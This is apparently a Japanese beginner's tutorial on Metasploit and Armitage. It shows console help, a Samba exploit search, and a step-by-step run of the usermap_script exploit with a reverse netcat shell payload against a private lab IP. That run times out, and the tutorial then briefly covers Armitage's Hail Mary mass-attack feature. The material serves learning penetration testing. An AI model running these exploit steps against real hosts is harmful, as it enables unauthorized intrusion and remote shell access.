Metasploit Frameworkの概要
強力なペネトレーションテストツール
主な用途に、脆弱性を突いて侵入実証(PoC)を行ったり、取得したシェルでポストエクスプロイト(権限昇格・情報摂取など)を実施する機能がある。
多様な攻撃シナリオを簡単に再現できる。
CLIで実施する。
└─$ msfconsole
Metasploit tip: View all productivity tips with the tips command
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v6.4.38-dev ]
+ -- --=[ 2467 exploits - 1273 auxiliary - 431 post ]
+ -- --=[ 1478 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
最初の状態で、可愛いウサギが登場(オープニングバナーは色々なパターンがある)
カテゴリ分けされたコマンド一覧を表示
msf6 > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
debug Display information useful for debugging
exit Exit the console
features Display the list of not yet released features that can be opted in to
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
load Load a framework plugin
quit Exit the console
repeat Repeat a list of commands
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
tips Show a list of useful productivity tips
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
...
キーワードによる検索
msf6 > search samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
1 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
2 \_ target: Automatic . . . .
3 \_ target: Windows 2000 English . . . .
4 \_ target: Windows XP English SP0-1 . . . .
5 \_ target: Windows XP English SP2 . . . .
6 \_ target: Windows 2003 English SP0 . . . .
7 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
8 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
9 \_ target: Windows x86 . . . .
10 \_ target: Windows x64 . . . .
11 post/linux/gather/enum_configs . normal No Linux Gather Configurations
12 auxiliary/scanner/rsync/modules_list . normal No List Rsync Modules
13 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
14 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
15 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
16 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
17 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
18 \_ target: 2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10 . . . .
19 \_ target: 2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10 . . . .
20 \_ target: 2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04 . . . .
21 \_ target: 2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10 . . . .
22 \_ target: 2:3.5.6~dfsg-3squeeze6 on Debian Squeeze . . . .
23 \_ target: 3.5.10-0.107.el5 on CentOS 5 . . . .
24 auxiliary/admin/smb/samba_symlink_traversal . normal No Samba Symlink Directory Traversal
25 auxiliary/scanner/smb/smb_uninit_cred . normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
26 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
27 \_ target: Linux (Debian5 3.2.5-4lenny6) . . . .
28 \_ target: Debugging Target . . . .
29 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
30 \_ target: Automatic (Interact) . . . .
31 \_ target: Automatic (Command) . . . .
32 \_ target: Linux x86 . . . .
33 \_ target: Linux x86_64 . . . .
34 \_ target: Linux ARM (LE) . . . .
35 \_ target: Linux ARM64 . . . .
36 \_ target: Linux MIPS . . . .
37 \_ target: Linux MIPSLE . . . .
38 \_ target: Linux MIPS64 . . . .
39 \_ target: Linux MIPS64LE . . . .
40 \_ target: Linux PPC . . . .
41 \_ target: Linux PPC64 . . . .
42 \_ target: Linux PPC64 (LE) . . . .
43 \_ target: Linux SPARC . . . .
44 \_ target: Linux SPARC64 . . . .
45 \_ target: Linux s390x . . . .
46 auxiliary/dos/samba/lsa_addprivs_heap . normal No Samba lsa_io_privilege_set Heap Overflow
47 auxiliary/dos/samba/lsa_transnames_heap . normal No Samba lsa_io_trans_names Heap Overflow
48 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
49 \_ target: Linux vsyscall . . . .
50 \_ target: Linux Heap Brute Force (Debian/Ubuntu) . . . .
51 \_ target: Linux Heap Brute Force (Gentoo) . . . .
52 \_ target: Linux Heap Brute Force (Mandriva) . . . .
53 \_ target: Linux Heap Brute Force (RHEL/CentOS) . . . .
54 \_ target: Linux Heap Brute Force (SUSE) . . . .
55 \_ target: Linux Heap Brute Force (Slackware) . . . .
56 \_ target: Linux Heap Brute Force (OpenWRT MIPS) . . . .
57 \_ target: DEBUG . . . .
58 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
59 \_ target: Automatic . . . .
60 \_ target: Mac OS X 10.4.x x86 Samba 3.0.10 . . . .
61 \_ target: Mac OS X 10.4.x PPC Samba 3.0.10 . . . .
62 \_ target: DEBUG . . . .
63 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
64 \_ target: Solaris 8/9/10 x86 Samba 3.0.21-3.0.24 . . . .
65 \_ target: Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24 . . . .
66 \_ target: DEBUG . . . .
67 auxiliary/dos/samba/read_nttrans_ea_list . normal No Samba read_nttrans_ea_list Integer Overflow
68 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
69 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
70 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
71 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
72 \_ target: Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce . . . .
73 \_ target: Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce . . . .
74 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
75 \_ target: Automatic . . . .
76 \_ target: Windows 2000 . . . .
77 \_ target: Windows XP . . . .
Interact with a module by name or index. For example info 77, use 77 or use exploit/windows/http/sambar6_search_results
After interacting with a module you can manually set a TARGET with set TARGET 'Windows XP'
上の中で、exploit/multi/samba/usermap_scriptを使ってみる
optionを出してみる
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-m
etasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.64.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
RHOST:ターゲットホストを指定する(指定しないと動かない)
msf6 exploit(multi/samba/usermap_script) > set RHOST 192.168.10.150
RHOST => 192.168.10.150
msf6 exploit(multi/samba/usermap_script) > options
...
RHOSTS 192.168.10.150 yes The target host(s), see https://docs.metasploit.com/docs/using-m
...
よし、実行
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.64.2:4444
[-] 192.168.10.150:139 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.10.150:139) timed out.
[*] Exploit completed, but no session was created.
失敗したけど、まーこんあ感じ。
Armitageの概要
ArmitageはMetasploit Frameworkを操作をGUIでできるツールです。
要はMetasploit FrameworkはちょっとめんどくさいのでマウスぽちぽちでできるようにしたのがArmitageです。
本体やサービスがアイコンで並びドラッグ&ドロップを使い脆弱性スキャンやsxploitを投入できるため、CLIに不慣れた学習者でも視覚的に手順を追えます。
操作
最初の画面はこんな感じ
上段のlinuxのペンギンたちがターゲットのホスト。OSをlinuxを設定しているためペンギンになっている。
Attcks > Hail Mary
で脆弱性を検査する
実行可能な攻撃が出力される
ターゲット上で右クリック > Attackに実行可能な攻撃がでてくる
Launchを押して実行開始
